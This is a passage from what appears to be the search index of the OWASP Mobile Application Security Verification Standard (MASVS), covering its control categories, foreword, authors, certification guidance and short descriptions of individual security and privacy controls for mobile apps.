"},{"location":"MASVS/09-MASVS-PLATFORM/","title":"MASVS-PLATFORM: Platform Interaction","text":"The security of mobile apps heavily depends on their interaction with the mobile platform, which often involves exposing data or functionality intentionally through the use of platform-provided inter-process communication (IPC) mechanisms and WebViews to enhance the user experience. However, these mechanisms can also be exploited by attackers or other installed apps, potentially compromising the app's security.
Furthermore, sensitive data, such as passwords, credit card details, and one-time passwords in notifications, is often displayed in the app's user interface. It is essential to ensure that this data is not unintentionally leaked through platform mechanisms such as auto-generated screenshots or accidental disclosure through shoulder surfing or device sharing.
This category comprises controls that ensure the app's interactions with the mobile platform occur securely. These controls cover the secure use of platform-provided IPC mechanisms, WebView configurations to prevent sensitive data leakage and functionality exposure, and secure display of sensitive data in the app's user interface. By implementing these controls, mobile app developers can safeguard sensitive user information and prevent unauthorized access by attackers.
"},{"location":"MASVS/10-MASVS-CODE/","title":"MASVS-CODE: Code Quality","text":"Mobile apps have many data entry points, including the UI, IPC, network, and file system, which might receive data that has been inadvertently modified by untrusted actors. By treating this data as untrusted input and properly verifying and sanitizing it before use, developers can prevent classical injection attacks, such as SQL injection, XSS, or insecure deserialization. However, other common coding vulnerabilities, such as memory corruption flaws, are hard to detect in penetration testing but easy to prevent with secure architecture and coding practices. Developers should follow best practices such as the OWASP Software Assurance Maturity Model (SAMM) and NIST.SP.800-218 Secure Software Development Framework (SSDF) to avoid introducing these flaws in the first place.
This category covers coding vulnerabilities that arise from external sources such as app data entry points, the OS, and third-party software components. Developers should verify and sanitize all incoming data to prevent injection attacks and bypass of security checks. They should also enforce app updates and ensure that the app runs up-to-date platforms to protect users from known vulnerabilities.
"},{"location":"MASVS/11-MASVS-RESILIENCE/","title":"MASVS-RESILIENCE: Resilience Against Reverse Engineering and Tampering","text":"Defense-in-depth measures such as code obfuscation, anti-debugging, anti-tampering, etc. are important to increase app resilience against reverse engineering and specific client-side attacks. They add multiple layers of security controls to the app, making it more difficult for attackers to successfully reverse engineer and extract valuable intellectual property or sensitive data from it, which could result in:
The controls in this category aim to ensure that the app is running on a trusted platform, prevent tampering at runtime and ensure the integrity of the app's intended functionality. Additionally, the controls impede comprehension by making it difficult to figure out how the app works using static analysis and prevent dynamic analysis and instrumentation that could allow an attacker to modify the code at runtime.
However, note that the lack of any of these measures does not necessarily cause vulnerabilities - instead, they add threat-specific additional protection to apps which must also fulfil the rest of the OWASP MASVS security controls according to their specific threat models.
"},{"location":"MASVS/12-MASVS-PRIVACY/","title":"MASVS-PRIVACY: Privacy","text":"The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
Note on \"Data Collection and Sharing\":For the MASTG tests, we treat \"Collect\" and \"Share\" in a unified manner. This means that whether the app is sending data to another server or transferring it to another app on the device, we view it as data that's potentially leaving the user's control. Validating what happens to the data on remote endpoints is challenging and often not feasible due to access restrictions and the dynamic nature of server-side operations. Therefore, this issue is outside of the scope of the MASVS.
IMPORTANT DISCLAIMER:
MASVS-PRIVACY is not intended to serve as an exhaustive or exclusive reference. While it provides valuable guidance on app-centric privacy considerations, it should never replace comprehensive assessments, such as a Data Protection Impact Assessment (DPIA) mandated by the General Data Protection Regulation (GDPR) or other pertinent legal and regulatory frameworks. Stakeholders are strongly advised to undertake a holistic approach to privacy, integrating MASVS-PRIVACY insights with broader assessments to ensure comprehensive data protection compliance. Given the specialized nature of privacy regulations and the complexity of data protection, these assessments are best conducted by privacy experts rather than security experts.
"},{"location":"MASVS/CHANGELOG/","title":"Changelog","text":""},{"location":"MASVS/CHANGELOG/#v131-and-newer","title":"V1.3.1 and newer","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page.
"},{"location":"MASVS/CHANGELOG/#v13-13-may-2021","title":"V1.3 - 13 May 2021","text":"We are proud to announce the introduction of a new document build pipeline, which is a major milestone for our project. The build pipeline is based on Pandocker and Github Actions. This significantly reduces the time spent on creating new releases and will also be the foundation for the OWASP MSTG and will be made available for the OWASP ASVS project.
"},{"location":"MASVS/CHANGELOG/#changes","title":"Changes","text":"The following changes are part of release 1.2:
The following changes are part of pre-release 1.2:
The following changes are part of release 1.1.4:
The following changes are part of release 1.1.2:
The following changes are part of release 1.1:
The following changes are part of release 1.0:
Technological revolutions can happen quickly. Less than a decade ago, smartphones were clunky devices with little keyboards - expensive playthings for tech-savvy business users. Today, smartphones are an essential part of our lives. We've come to rely on them for information, navigation and communication, and they are ubiquitous both in business and in our social lives.
Every new technology introduces new security risks, and keeping up with those changes is one of the main challenges the security industry faces. The defensive side is always a few steps behind. For example, the default reflex for many was to apply old ways of doing things: Smartphones are like small computers, and mobile apps are just like classic software, so surely the security requirements are similar? But it doesn't work like that. Smartphone operating systems are different from desktop operating systems, and mobile apps are different from web apps. For example, the classical method of signature-based virus scanning doesn't make sense in modern mobile OS environments: Not only is it incompatible with the mobile app distribution model, it's also technically impossible due to sandboxing restrictions. Also, some vulnerability classes, such as buffer overflows and XSS issues, are less relevant in the context of run-of-the-mill mobile apps than in, say, desktop apps and web applications (exceptions apply).
Over time, our industry has gotten a better grip on the mobile threat landscape. As it turns out, mobile security is all about data protection: Apps store our personal information, pictures, recordings, notes, account data, business information, location and much more. They act as clients that connect us to services we use on a daily basis, and as communications hubs that processes each and every message we exchange with others. Compromise a person's smartphone and you get unfiltered access to that person's life. When we consider that mobile devices are more readily lost or stolen and mobile malware is on the rise, the need for data protection becomes even more apparent.
A security standard for mobile apps must therefore focus on how mobile apps handle, store and protect sensitive information. Even though modern mobile operating systems like iOS and Android offer mature APIs for secure data storage and communication, those have to be implemented and used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some of the aspects that require careful consideration.
An important question in need of industry consensus is how far exactly one should go in protecting the confidentiality and integrity of data. For example, most of us would agree that a mobile app should verify the server certificate in a TLS exchange. But what about certificate or public key pinning? Does not doing it result in a vulnerability? Should this be a requirement if an app handles sensitive data, or is it maybe even counter-productive? Do we need to encrypt data stored in SQLite databases, even though the OS sandboxes the app? What is appropriate for one app might be unrealistic for another. The MASVS is an attempt to standardize these requirements using profiles that fit different threat scenarios.
Furthermore, the appearance of root malware and remote administration tools has created awareness of the fact that mobile operating systems themselves have exploitable flaws, so containerization strategies are increasingly used to afford additional protection to sensitive data and prevent client-side tampering. This is where things get complicated. Hardware- backed security features and OS-level containerization solutions, such as Android Enterprise and Samsung Knox, do exist, but they aren't consistently available across different devices. As a band aid, it is possible to implement software-based protection measures - but unfortunately, there are no standards or testing processes for verifying these kinds of protections.
As a result, mobile app security testing reports are all over the place: For example, some testers report a lack of obfuscation or root detection in an Android app as \u201csecurity flaw\u201d. On the other hand, measures like string encryption, debugger detection or control flow obfuscation aren't considered mandatory. However, this binary way of looking at things doesn't make sense because resilience is not a binary proposition: It depends on the particular client-side threats one aims to defend against. Software protections are not useless, but they can ultimately be bypassed, so they must never be used as a replacement for security controls.
The overall goal of the MASVS is to offer a baseline for mobile application security, while also allowing for the inclusion of defense-in-depth measures and protections against client-side threats. The MASVS is meant to achieve the following:
We are aware that 100% industry consensus is impossible to achieve. Nevertheless, we hope that the MASVS is useful in providing guidance throughout all phases of mobile app development and testing. As an open source standard, the MASVS will evolve over time, and we welcome any contributions and suggestions.
By Bernhard Mueller
"},{"location":"MASVS/Intro/02-Frontispiece/","title":"About the Standard","text":"The OWASP Mobile Application Security Verification Standard (MASVS) is the industry standard for mobile application security. It provides a comprehensive set of security controls that can be used to assess the security of mobile apps across various platforms (e.g., Android, iOS) and deployment scenarios (e.g., consumer, enterprise). The standard covers the key components of the mobile app attack surface including storage, cryptography, authentication and authorization, network communication, interaction with the mobile platform, code quality and resilience against reverse engineering and tampering.
The OWASP MASVS is the result of years of community effort and industry feedback. We thank all the contributors who have helped shape this standard. We welcome your feedback on the OWASP MASVS at any time, especially as you apply it to your own organization and mobile app development projects. Getting inputs from a variety of mobile app developers will help us improve and update the standard which is revised periodically based on your inputs and feedback.
You can provide feedback using GitHub Discussions in the OWASP MASVS repo https://github.com/OWASP/owasp-masvs/discussions, or contact the project leads directly https://mas.owasp.org/contact/.
The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"MASVS/Intro/02-Frontispiece/#authors","title":"Authors","text":""},{"location":"MASVS/Intro/02-Frontispiece/#sven-schleier","title":"Sven Schleier","text":"
Sven is specialised in penetration testing and application security and has guided numerous projects to build security in from the start. He strongly believes in knowledge sharing and is speaking worldwide at meetups and conferences, is an adjunct professor and is conducting hands-on workshops about mobile app security to penetration testers, developers and students.
"},{"location":"MASVS/Intro/02-Frontispiece/#carlos-holguera","title":"Carlos Holguera","text":"Carlos is a mobile security research engineer with many years of hands-on experience in security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-beckers","title":"Jeroen Beckers","text":"Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
"},{"location":"MASVS/Intro/02-Frontispiece/#bernhard-mueller","title":"Bernhard Mueller","text":"Bernhard is a cyber security specialist with a talent for hacking systems of all kinds. During more than a decade in the industry, he has published many zero-day exploits for software. BlackHat USA commended his pioneering work in mobile security with a Pwnie Award for Best Research.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-willemsen","title":"Jeroen Willemsen","text":"Jeroen is a principal security architect with a passion for mobile security and risk management. He has supported companies as a security coach, a security engineer and as a full-stack developer. He loves explaining technical subjects: from security issues to programming challenges.
"},{"location":"MASVS/Intro/02-Frontispiece/#contributors","title":"Contributors","text":"All of our contributors are listed in the Contributing section of the OWASP MAS website:
https://mas.owasp.org/contributing/
"},{"location":"MASVS/Intro/02-Frontispiece/#donators","title":"Donators","text":"While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes outside help is required. We therefore thank our donators for providing the funds to be able to hire technical editors. Note that their donation does not influence the content of the MASVS or MASTG in any way. The Donation Packages are described on the OWASP MAS Website.
"},{"location":"MASVS/Intro/02-Frontispiece/#changelog","title":"Changelog","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page:
https://github.com/OWASP/owasp-masvs/releases
"},{"location":"MASVS/Intro/02-Frontispiece/#copyright-and-license","title":"Copyright and License","text":"Copyright \u00a9 The OWASP Foundation. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. For any reuse or distribution, you must make clear to others the license terms of this work.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/","title":"The Mobile Application Security Verification Standard","text":"The Mobile Application Security Verification Standard (MASVS) is a comprehensive security standard developed by the Open Worldwide Application Security Project (OWASP). This framework provides a clear and concise set of guidelines and best practices for assessing and enhancing the security of mobile applications. The MASVS is designed to be used as a metric, guidance, and baseline for mobile app security verification, serving as a valuable resource for developers, application owners, and security professionals.
The objective of the MASVS is to establish a high level of confidence in the security of mobile apps by providing a set of controls that address the most common mobile application security issues. These controls were developed with a focus on providing guidance during all phases of mobile app development and testing, and to be used as a baseline for mobile app security verification during procurement.
By adhering to the controls outlined in the OWASP MASVS, organizations can ensure that their mobile applications are built with security in mind, reducing the risk of security breaches and protecting sensitive user data. Whether used as a metric, guidance, or baseline, the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications.
The OWASP MASVS is a living document and is regularly updated to reflect the changing threat landscape and new attack vectors. As such, it's important to stay up-to-date with the latest version of the standard and adapt security measures accordingly.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mobile-application-security-model","title":"Mobile Application Security Model","text":"The standard is divided into various groups that represent the most critical areas of the mobile attack surface. These control groups, labeled MASVS-XXXXX, provide guidance and standards for the following areas:
Each of these control groups contains individual controls labeled MASVS-XXXXX-Y, which provide specific guidance on the particular security measures that need to be implemented to meet the standard.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mas-testing-profiles","title":"MAS Testing Profiles","text":"The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. These profiles are now aligned with the NIST OSCAL (Open Security Controls Assessment Language) standard, which is a comprehensive catalog of security controls that can be used to secure information systems.
By aligning with OSCAL, the MASVS provides a more flexible and comprehensive approach to security testing. OSCAL provides a standard format for security control information, which allows for easier sharing and reuse of security controls across different systems and organizations. This allows for a more efficient use of resources and a more targeted approach to mobile app security testing.
However, it is important to note that implementing these profiles fully or partially should be a risk-based decision made in consultation with business owners. The profiles should be tailored to the specific security risks and requirements of the mobile application being developed, and any deviations from the recommended controls should be carefully justified and documented.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#assumptions","title":"Assumptions","text":"When using the MASVS, it's important to keep in mind the following assumptions:
While the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications, it cannot guarantee absolute security. It should be used as a baseline for security requirements, but additional security measures should also be implemented as appropriate to address specific risks and threats to the mobile app.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-architecture-design-and-threat-modeling-for-mobile-apps","title":"Security Architecture, Design and Threat Modeling for Mobile Apps","text":"The OWASP MASVS assumes that best practices for secure architecture, design, and threat modeling have been followed as a foundation.
Security must be a top priority throughout all stages of mobile app development, from the initial planning and design phase to deployment and ongoing maintenance. Developers need to follow secure development best practices and ensure that security measures are prioritized to protect sensitive data, comply with policies and regulations, and identify and address security issues that can be targeted by attackers.
While the MASVS and MASTG focuses on controls and technical test cases for app security assessments, non-technical aspects such as following best practices laid out by OWASP Software Assurance Maturity Model (SAMM) or NIST.SP.800-218 Secure Software Development Framework (SSDF) for secure architecture, design, and threat modeling are still important. The MASVS can also be used as reference and input for a threat model to raise awareness of potential attacks.
To ensure that these practices are followed, developers can provide documentation or evidence of adherence to these standards, such as design documents, threat models, and security architecture diagrams. Additionally, interviews can be conducted to collect information on adherence to these practices and provide an understanding of the level of compliance with these standards.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#secure-app-ecosystem","title":"Secure App Ecosystem","text":"The OWASP MASVS assumes other relevant security standards are also leveraged to ensure that all systems involved in the app's operation meet their applicable requirements.
Mobile apps often interact with multiple systems, including backend servers, third-party APIs, Bluetooth devices, cars, IoT devices, and more. Each of these systems may introduce their own security risks that must be considered as part of the mobile app's security design and threat modeling. For example, when interacting with a backend server, the OWASP Application Security Verification Standard (ASVS) should be used to ensure that the server is secure and meets the required security standards. In the case of Bluetooth devices, the app should be designed to prevent unauthorized access, while for cars, the app should be designed to protect the user's data and ensure that there are no safety issues with the car's operation.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-knowledge-and-expertise","title":"Security Knowledge and Expertise","text":"The OWASP MASVS assumes a certain level of security knowledge and expertise among developers and security professionals using the standard. It's important to have a good understanding of mobile app security concepts, as well as the relevant tools and techniques used for mobile app security testing and assessment. To support this, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG), which provides in-depth guidance on mobile app security testing and assessment.
Mobile app development is a rapidly evolving field, with new technologies, programming languages, and frameworks constantly emerging. It's essential for developers and security professionals to stay current with these developments, as well as to have a solid foundation in fundamental security principles.
OWASP SAMM provides a dedicated \"Education & Guidance\" domain which aims to ensure that all stakeholders involved in the software development lifecycle are aware of the software security risks and are equipped with the knowledge and skills to mitigate these risks. This includes developers, testers, architects, project managers, executives, and other personnel involved in software development and deployment.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#applicability-of-the-masvs","title":"Applicability of the MASVS","text":"By adhering to the MASVS, businesses and developers can ensure that their mobile app are secure and meet industry-standard security requirements, regardless of the development approach used. This is the case for downloadable apps, as the project was traditionally focused on, but the MAS resources and guidelines are also applicable to other areas of the business such as preloaded applications and SDKs.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#native-apps","title":"Native Apps","text":"Native apps are written in platform-specific languages, such as Java/Kotlin for Android or Objective-C/Swift for iOS.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#cross-platform-and-hybrid-apps","title":"Cross-Platform and Hybrid Apps","text":"Apps based on cross-platform (Flutter, React Native, Xamarin, Ionic, etc.) and hybrid (Cordova, PhoneGap, Framework7, Onsen UI, etc.) frameworks may be susceptible to platform-specific vulnerabilities that don't exist in native apps. For example, some JavaScript frameworks may introduce new security issues that don't exist in other programming languages. It is therefore essential to follow the security best practices of the used frameworks.
The MASVS is agnostic to the type of mobile application being developed. This means that the guidelines and best practices outlined in the MASVS can be applied to all types of mobile apps, including cross-platform and hybrid apps.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#preloads","title":"Preloads","text":"Preloaded apps are apps that are installed on a user's device at factory time and may have elevated privileges that leave users vulnerable to exploitative business practices. Given the large number of preloaded apps on an average user's device, it's important to measure their risk in a quantifiable way.
There are hundreds of preloads that may ship on a device, and as a result, automation is critical. A subset of MAS criteria that is automation-friendly may be a good basis.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#sdks","title":"SDKs","text":"SDKs play a vital role in the mobile app value chain, supplying code developers need to build faster, smarter, and more profitably. Developers rely on them heavily, with the average mobile app using 30 SDKs, and 90% of code sourced from third parties. While this widespread use delivers significant benefits to developers, it also propagates safety and security issues.
SDKs offer a variety of functionality, and should be regarded as an individual project. You should evaluate how the MASVS applies to the used SDKs to ensure the highest possible security testing coverage.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/","title":"Assessment and Certification","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#owasps-stance-on-masvs-certifications-and-trust-marks","title":"OWASP's Stance on MASVS Certifications and Trust Marks","text":"OWASP, as a vendor-neutral not-for-profit organization, does not certify any vendors, verifiers or software.
All such assurance assertions, trust marks, or certifications are not officially vetted, registered, or certified by OWASP, so an organization relying upon such a view needs to be cautious of the trust placed in any third party or trust mark claiming (M)ASVS certification.
This should not inhibit organizations from offering such assurance services, as long as they do not claim official OWASP certification.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#guidance-for-certifying-mobile-apps","title":"Guidance for Certifying Mobile Apps","text":"The recommended way of verifying compliance of a mobile app with the MASVS is by performing an \"open book\" review, meaning that the testers are granted access to key resources such as architects and developers of the app, project documentation, source code, and authenticated access to endpoints, including access to at least one user account for each role.
It is important to note that the MASVS only covers the security of the mobile app (client-side). It does not contain specific controls for the remote endpoints (e.g. web services) associated with the app and they should be verified against appropriate standards, such as the OWASP ASVS.
A certifying organization must include in any report the scope of the verification (particularly if a key component is out of scope), a summary of verification findings, including passed and failed tests, with clear indications of how to resolve the failed tests. Keeping detailed work papers, screenshots or recording, scripts to reliably and repeatedly exploit an issue, and electronic records of testing, such as intercepting proxy logs and associated notes such as a cleanup list, is considered standard industry practice. It is not sufficient to simply run a tool and report on the failures; this does not provide sufficient evidence that all issues at a certifying level have been tested and tested thoroughly. In case of dispute, there should be sufficient supportive evidence to demonstrate that every verified control has indeed been tested.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#using-the-owasp-mobile-application-security-testing-guide-mastg","title":"Using the OWASP Mobile Application Security Testing Guide (MASTG)","text":"The OWASP MASTG is a manual for testing the security of mobile apps. It describes the technical processes for verifying the controls listed in the MASVS. The MASTG includes a list of test cases, each of which map to a control in the MASVS. While the MASVS controls are high-level and generic, the MASTG provides in-depth recommendations and testing procedures on a per-mobile-OS basis.
Testing the app's remote endpoints is not covered in the MASTG. For example:
The use of source code scanners and black-box testing tools is encouraged in order to increase efficiency whenever possible. It is however not possible to complete MASVS verification using automated tools alone, since every mobile app is different. In order to fully verify the security of the app it is essential to understand the overall architecture, business logic, and technical pitfalls of the specific technologies and frameworks being used.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#other-uses","title":"Other Uses","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-detailed-security-architecture-guidance","title":"As Detailed Security Architecture Guidance","text":"One of the more common uses for the Mobile Application Security Verification Standard is as a resource for security architects. The two major security architecture frameworks, SABSA or TOGAF, are missing a great deal of information that is necessary to complete mobile application security architecture reviews. MASVS can be used to fill in those gaps by allowing security architects to choose better controls for issues common to mobile apps.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-replacement-for-off-the-shelf-secure-coding-checklists","title":"As a Replacement for Off-the-shelf Secure Coding Checklists","text":"Many organizations can benefit from adopting the MASVS, by choosing one of the two levels, or by forking MASVS and changing what is required for each application's risk level in a domain-specific way. We encourage this type of forking as long as traceability is maintained, so that if an app has passed control 4.1, this means the same thing for forked copies as the standard evolves.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-basis-for-security-testing-methodologies","title":"As a Basis for Security Testing Methodologies","text":"A good mobile app security testing methodology should cover all controls listed in the MASVS. The OWASP Mobile Application Security Testing Guide (MASTG) describes black-box and white-box test cases for each verification control.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-guide-for-automated-unit-and-integration-tests","title":"As a Guide for Automated Unit and Integration Tests","text":"The MASVS is designed to be highly testable, with the sole exception of architectural controls. Automated unit, integration and acceptance testing based on the MASVS controls can be integrated in the continuous development lifecycle. This not only increases developer security awareness, but also improves the overall quality of the resulting apps, and reduces the amount of findings during security testing in the pre-release phase.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#for-secure-development-training","title":"For Secure Development Training","text":"MASVS can also be used to define characteristics of secure mobile apps. Many \"secure coding\" courses are simply ethical hacking courses with a light smear of coding tips. This does not help developers. Instead, secure development courses can use the MASVS, with a strong focus on the proactive controls documented in the MASVS, rather than e.g. the Top 10 code security issues.
"},{"location":"MASVS/controls/MASVS-AUTH-1/","title":"MASVS-AUTH-1","text":"The app uses secure authentication and authorization protocols and follows the relevant best practices.
Most apps connecting to a remote endpoint require user authentication and also enforce some kind of authorization. While the enforcement of these mechanisms must be on the remote endpoint, the apps also have to ensure that it follows all the relevant best practices to ensure a secure use of the involved protocols.
"},{"location":"MASVS/controls/MASVS-AUTH-2/","title":"MASVS-AUTH-2","text":"The app performs local authentication securely according to the platform best practices.
Many apps allow users to authenticate via biometrics or a local PIN code. These authentication mechanisms need to be correctly implemented. Additionally, some apps might not have a remote endpoint, and rely fully on local app authentication.
"},{"location":"MASVS/controls/MASVS-AUTH-3/","title":"MASVS-AUTH-3","text":"The app secures sensitive operations with additional authentication.
Some additional form of authentication is often desirable for sensitive actions inside the app. This can be done in different ways (biometric, pin, MFA code generator, email, deep links, etc) and they all need to be implemented securely.
"},{"location":"MASVS/controls/MASVS-CODE-1/","title":"MASVS-CODE-1","text":"The app requires an up-to-date platform version.
Every release of the mobile OS includes security patches and new security features. By supporting older versions, apps stay vulnerable to well-known threats. This control ensures that the app is running on an up-to-date platform version so that users have the latest security protections.
"},{"location":"MASVS/controls/MASVS-CODE-2/","title":"MASVS-CODE-2","text":"The app has a mechanism for enforcing app updates.
Sometimes critical vulnerabilities are discovered in the app when it is already in production. This control ensures that there is a mechanism to force the users to update the app before they can continue using it.
"},{"location":"MASVS/controls/MASVS-CODE-3/","title":"MASVS-CODE-3","text":"The app only uses software components without known vulnerabilities.
To be truly secure, a full whitebox assessment should have been performed on all app components. However, as it usually happens with e.g. for third-party components this is not always feasible and not typically part of a penetration test. This control covers \"low-hanging fruit\" cases, such as those that can be detected just by scanning libraries for known vulnerabilities.
"},{"location":"MASVS/controls/MASVS-CODE-4/","title":"MASVS-CODE-4","text":"The app validates and sanitizes all untrusted inputs.
Apps have many data entry points including the UI, IPC, the network, the file system, etc. This incoming data might have been inadvertently modified by untrusted actors and may lead to bypass of critical security checks as well as classical injection attacks such as SQL injection, XSS or insecure deserialization. This control ensures that this data is treated as untrusted input and is properly verified and sanitized before it's used.
"},{"location":"MASVS/controls/MASVS-CRYPTO-1/","title":"MASVS-CRYPTO-1","text":"The app employs current strong cryptography and uses it according to industry best practices.
Cryptography plays an especially important role in securing the user's data - even more so in a mobile environment, where attackers having physical access to the user's device is a likely scenario. This control covers general cryptography best practices, which are typically defined in external standards.
"},{"location":"MASVS/controls/MASVS-CRYPTO-2/","title":"MASVS-CRYPTO-2","text":"The app performs key management according to industry best practices.
Even the strongest cryptography would be compromised by poor key management. This control covers the management of cryptographic keys throughout their lifecycle, including key generation, storage and protection.
"},{"location":"MASVS/controls/MASVS-NETWORK-1/","title":"MASVS-NETWORK-1","text":"The app secures all network traffic according to the current best practices.
Ensuring data privacy and integrity of any data in transit is critical for any app that communicates over the network. This is typically done by encrypting data and authenticating the remote endpoint, as TLS does. However, there are many ways for a developer to disable the platform secure defaults, or bypass them completely by using low-level APIs or third-party libraries. This control ensures that the app is in fact setting up secure connections in any situation.
"},{"location":"MASVS/controls/MASVS-NETWORK-2/","title":"MASVS-NETWORK-2","text":"The app performs identity pinning for all remote endpoints under the developer's control.
Instead of trusting all the default root CAs of the framework or device, this control will make sure that only very specific CAs are trusted. This practice is typically called certificate pinning or public key pinning.
"},{"location":"MASVS/controls/MASVS-PLATFORM-1/","title":"MASVS-PLATFORM-1","text":"The app uses IPC mechanisms securely.
Apps typically use platform provided IPC mechanisms to intentionally expose data or functionality. Both installed apps and the user are able to interact with the app in many different ways. This control ensures that all interactions involving IPC mechanisms happen securely.
"},{"location":"MASVS/controls/MASVS-PLATFORM-2/","title":"MASVS-PLATFORM-2","text":"The app uses WebViews securely.
WebViews are typically used by apps that have a need for increased control over the UI. This control ensures that WebViews are configured securely to prevent sensitive data leakage as well as sensitive functionality exposure (e.g. via JavaScript bridges to native code).
"},{"location":"MASVS/controls/MASVS-PLATFORM-3/","title":"MASVS-PLATFORM-3","text":"The app uses the user interface securely.
Sensitive data has to be displayed in the UI in many situations (e.g. passwords, credit card details, OTP codes in notifications). This control ensures that this data doesn't end up being unintentionally leaked due to platform mechanisms such as auto-generated screenshots or accidentally disclosed via e.g. shoulder surfing or sharing the device with another person.
"},{"location":"MASVS/controls/MASVS-PRIVACY-1/","title":"MASVS-PRIVACY-1","text":"The app minimizes access to sensitive data and resources.
Apps should only request access to the data they absolutely need for their functionality and always with informed consent from the user. This control ensures that apps practice data minimization and restricts access control, reducing the potential impact of data breaches or leaks.
Furthermore, apps should share data with third parties only when necessary, and this should include enforcing that third-party SDKs operate based on user consent, not by default or without it. Apps should prevent third-party SDKs from ignoring consent signals or from collecting data before consent is confirmed.
Additionally, apps should be aware of the 'supply chain' of SDKs they incorporate, ensuring that no data is unnecessarily passed down their chain of dependencies. This end-to-end responsibility for data aligns with recent SBOM regulatory requirements, making apps more accountable for their data practices.
"},{"location":"MASVS/controls/MASVS-PRIVACY-2/","title":"MASVS-PRIVACY-2","text":"The app prevents identification of the user.
Protecting user identity is crucial. This control emphasizes the use of unlinkability techniques like data abstraction, anonymization and pseudonymization to prevent user identification and tracking.
Another key aspect addressed by this control is to establish technical barriers when employing complex 'fingerprint-like' signals (e.g. device IDs, IP addresses, behavioral patterns) for specific purposes. For instance, a fingerprint used for fraud detection should be isolated and not repurposed for audience measurement in an analytics SDK. This ensures that each data stream serves its intended function without risking user privacy.
"},{"location":"MASVS/controls/MASVS-PRIVACY-3/","title":"MASVS-PRIVACY-3","text":"The app is transparent about data collection and usage.
Users have the right to know how their data is being used. This control ensures that apps provide clear information about data collection, storage, and sharing practices, including any behavior a user wouldn't reasonably expect, such as background data collection. Apps should also adhere to platform guidelines on data declarations.
"},{"location":"MASVS/controls/MASVS-PRIVACY-4/","title":"MASVS-PRIVACY-4","text":"The app offers user control over their data.
Users should have control over their data. This control ensures that apps provide mechanisms for users to manage, delete, and modify their data, and change privacy settings as needed (e.g. to revoke consent). Additionally, apps should re-prompt for consent and update their transparency disclosures when they require more data than initially specified.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-1/","title":"MASVS-RESILIENCE-1","text":"The app validates the integrity of the platform.
Running on a platform that has been tampered with can be very dangerous for apps, as this may disable certain security features, putting the data of the app at risk. Trusting the platform is essential for many of the MASVS controls relying on the platform being secure (e.g. secure storage, biometrics, sandboxing, etc.). This control tries to validate that the OS has not been compromised and its security features can thus be trusted.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-2/","title":"MASVS-RESILIENCE-2","text":"The app implements anti-tampering mechanisms.
Apps run on a user-controlled device, and without proper protections it's relatively easy to run a modified version locally (e.g. to cheat in a game, or enable premium features without paying), or upload a backdoored version of it to third-party app stores. This control tries to ensure the integrity of the app's intended functionality by preventing modifications to the original code and resources.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-3/","title":"MASVS-RESILIENCE-3","text":"The app implements anti-static analysis mechanisms.
Understanding the internals of an app is typically the first step towards tampering with it (either dynamically, or statically). This control tries to impede comprehension by making it as difficult as possible to figure out how an app works using static analysis.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-4/","title":"MASVS-RESILIENCE-4","text":"The app implements anti-dynamic analysis techniques.
Sometimes pure static analysis is very difficult and time consuming so it typically goes hand in hand with dynamic analysis. Observing and manipulating an app during runtime makes it much easier to decipher its behavior. This control aims to make it as difficult as possible to perform dynamic analysis, as well as prevent dynamic instrumentation which could allow an attacker to modify the code at runtime.
"},{"location":"MASVS/controls/MASVS-STORAGE-1/","title":"MASVS-STORAGE-1","text":"The app securely stores sensitive data.
